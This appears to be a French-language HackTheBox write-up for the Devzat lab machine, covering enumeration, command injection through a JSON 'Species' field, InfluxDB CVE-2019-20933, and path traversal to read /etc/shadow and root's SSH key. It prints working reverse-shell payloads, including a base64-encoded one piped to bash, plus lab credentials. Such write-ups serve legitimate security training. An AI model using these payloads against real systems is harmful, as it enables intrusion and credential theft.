Devzat HackTheBox (Writeup)

Skills:

Fuzzing Directory
Web Injection (RCE)
Abusing InfluxDB (CVE-2019-20933)
Abusing Devzat Chat /file command (Privilege Escalation)

Reconaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.118 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,80,8000)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80,8000 10.10.11.118 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP:

Port 80

En utilisant whatweb, nous trouvons un email associé au site : [email protected].

L'application nous informe également que nous pouvons utiliser le port 8000 pour se connecter via SSH pour "chater" :

ssh -l [username] devzat.htb -p 8000

Port 8000:

Nous essayons de nous connecter, mais un problème survient car une clé SSH est requise :

ssh -l jordan devzat.htb -p 8000

Forcer temporairement l'utilisation de SSH-RSA : Nous spécifions le type de clé SSH à utiliser pour cette session avec l'option suivante :

ssh -l jordan devzat.htb -p 8000 -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa

Projet Devzat (Chat SSH) :

Devzat est un serveur SSH personnalisé permettant de se connecter à un chat au lieu d'une invite de commande. Comme des applications SSH sont disponibles sur toutes les plateformes (y compris sur les téléphones), vous pouvez vous connecter à Devzat depuis n'importe quel appareil.

Voici une liste des commandes que l'on peut exécuter dans ce chat :

Fuzzing des répertoires :

Nous utilisons gobuster pour énumérer les répertoires sur le site :

gobuster dir -u http://devzat.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Aucun résultat intéressant n'a été trouvé.

Fuzzing des sous-domaines :

Nous effectuons une recherche des sous-domaines avec gobuster :

gobuster vhost -u http://devzat.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 | grep -Ev "403|302"

Nous découvrons le sous-domaine pets.devzat.htb et l'ajoutons au fichier /etc/hosts.

Vulnérabilité (RCE) JSON :

Nous avons la possibilité d'ajouter des "pets" avec leur espèce, ce qui permet une injection JSON.

Nous interceptez les requêtes avec Burp Suite et tentons de manipuler la requête en ajoutant une entrée avec le nom et l'espèce :

Cette entrée est interprétée, ce qui permet une injection.

{
    "Name": "jordan",
    "Species": "jordan"
}

Nous mettons en écoute les traces ICMP pour observer les communications et tester des injections de commandes :

sudo tcpdump -i tun0 icmp

Nous recevons un ping en retour, ce qui confirme la possibilité d'une exécution de commande à distance.

Ensuite, nous envoyons une requête avec curl vers notre serveur Python et recevons également une requête, ce qui confirme la vulnérabilité d'exécution de code à distance.

{

    "Name": "jordan",

    "Species": "test;bash -c "bash -i >%26 /dev/tcp/10.10.14.12/443 0>%261""

}

Reverse Shell

Nous tentons de créer un reverse shell :

bash -c "bash -i >%26 /dev/tcp/10.10.14.12/443 0>%261"

Cependant, une erreur de sortie se produit.

Solution à l'erreur (reverse shell) : Pour résoudre cette erreur, nous créons un fichier HTML contenant le reverse shell, que nous encodons en base64 :

#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.12/443 0>&1

Nous convertissons ce fichier en base64 :

base64 -w 0 index.html

Dans la requête, nous exécutons l'echo de la chaîne base64 encodée et la décodons avant d'exécuter le shell :

{

    "Name": "jordan",

    "Species": "test;echo IyEvYmluL2Jhc2ggCmJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNDQzIDA+JjEK | base64 -d | bash"

}

Une fois encore, nous mettons en écoute sur le port 443 et obtenons un shell inversé.

Traitement du terminal :

Pour stabiliser notre session, nous utilisons les commandes suivantes :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Élévation de Privilège:

Nous constatons qu'une élévation de privilèges est nécessaire. Nous devons effectuer un pivoting pour obtenir l'accès au compte de l'utilisateur catherine.

Identification des Ports Ouverts

Tout d'abord, nous observons les ports ouverts en interne en utilisant la commande suivante :

netstat -nltp

Les ports ouverts sont :

8086
8443
5000

Redirection de Ports (SSH)

Nous redirigeons les ports internes vers notre machine d'attaque en utilisant la clé privée de l'utilisateur et en appliquant les bonnes permissions :

chmod 600 id_rsa

sudo ssh -L 8086:127.0.0.1:8086 -L 8443:127.0.0.1:8443 -L 5000:127.0.0.1:5000 [email protected] -i id_rsa

Nous utilisons ensuite nmap pour scanner les ports redirigés :

nmap -sCV -p5000,8443,8086 localhost -oN targeted

Port 5000:

Nous constatons que ce port est lié au même service que celui trouvé sur le port 8000, ce qui ne nous permet pas d'exploiter davantage cette porte.

Port 8086 (InfluxDB)

Le service sur le port 8086 est InfluxDB, version 1.7.5. Nous identifions une vulnérabilité de type RCE (Remote Code Execution) dans InfluxDB :

Vulnérabilité : CVE-2019-20933

GitHub - LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933: InfluxDB CVE-2019-20933 vulnerability exploitGitHub

Cette vulnérabilité permet de contourner l'authentification en exploitant un jeton JWT dont le SharedSecret est vide (aka shared secret), ce qui nous donne accès à la base de données.

Accès à la Base de Données

Une fois connecté à InfluxDB, nous listons les bases de données disponibles:

SHOW DATABASES;

Nous sélectionnons la base devzat et explorons les données des utilisateurs. Nous commençons par lister les "mesures" (tables) :

SHOW MEASUREMENTS;

La table user contient des informations utiles. Pour explorer les colonnes de cette mesure, nous exécutons :

SHOW FIELD KEYS FROM "user";

Nous affichons ensuite les 10 premiers résultats pour la table user :

SELECT * FROM "user" LIMIT 10;

password

username

WillyWonka2021

wilhelm

woBeeYareedahc7Oogeephies7Aiseci

catherine

RoyalQueenBee$

charles

Le mot de passe de l'utilisateur catherine est woBeeYareedahc7Oogeephies7Aiseci, ce qui nous permet de récupérer le flag utilisateur.

Flag user.txt :)

on reusis acceder et pivoter en tant que catherine

Port 8443 (Devzat - Production)

Le port 8443 est dédié à une instance de Devzat en production. Nous constatons qu'un paramètre file permet de lister tous les fichiers du système en tant que root. Cependant, l'accès à cette fonctionnalité est protégé par un mot de passe.

Nous essayons d'utiliser le mot de passe de catherine, mais cela échoue. Nous devons maintenant rechercher des fichiers que catherine peut lire sur le système.

Recherche de Fichiers Accessibles par Catherine

Nous utilisons la commande suivante pour rechercher tous les fichiers lisibles par catherine :

find / -user catherine -readable 2>/dev/null | grep -vE "cgroup|proc"

Nous trouvons deux fichiers .zip de sauvegarde :

/var/backups/devzat-main.zip
/var/backups/devzat-dev.zip

Nous téléchargeons le fichier de sauvegarde devzat-dev.zip et filtrons son contenu à la recherche de mots de passe. Nous trouvons un mot de passe utile : CeilingCatStillAThingIn2021?.

Nous tentons ensuite d'utiliser ce mot de passe pour accéder au fichier /etc/shadow via le paramètre file :

/file /etc/shadows CeilingCatStillAThingIn2021?

Bien que le mot de passe soit correct, un path traversal est nécessaire pour obtenir un accès complet. Nous utilisons la commande suivante pour naviguer dans le système de fichiers :

/file ../../../../etc/shadow CeilingCatStillAThingIn2021?

Nous réussissons à afficher le fichier /etc/shadow en tant que root.

Accès SSH en tant que Root

Enfin, nous utilisons un path traversal supplémentaire pour accéder à la clé SSH de root :

/file ../../../../root/.ssh/id_rsa CeilingCatStillAThingIn2021?

Nous téléchargeons la clé SSH et nous connectons en tant que root.

Flag root.txt :)

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?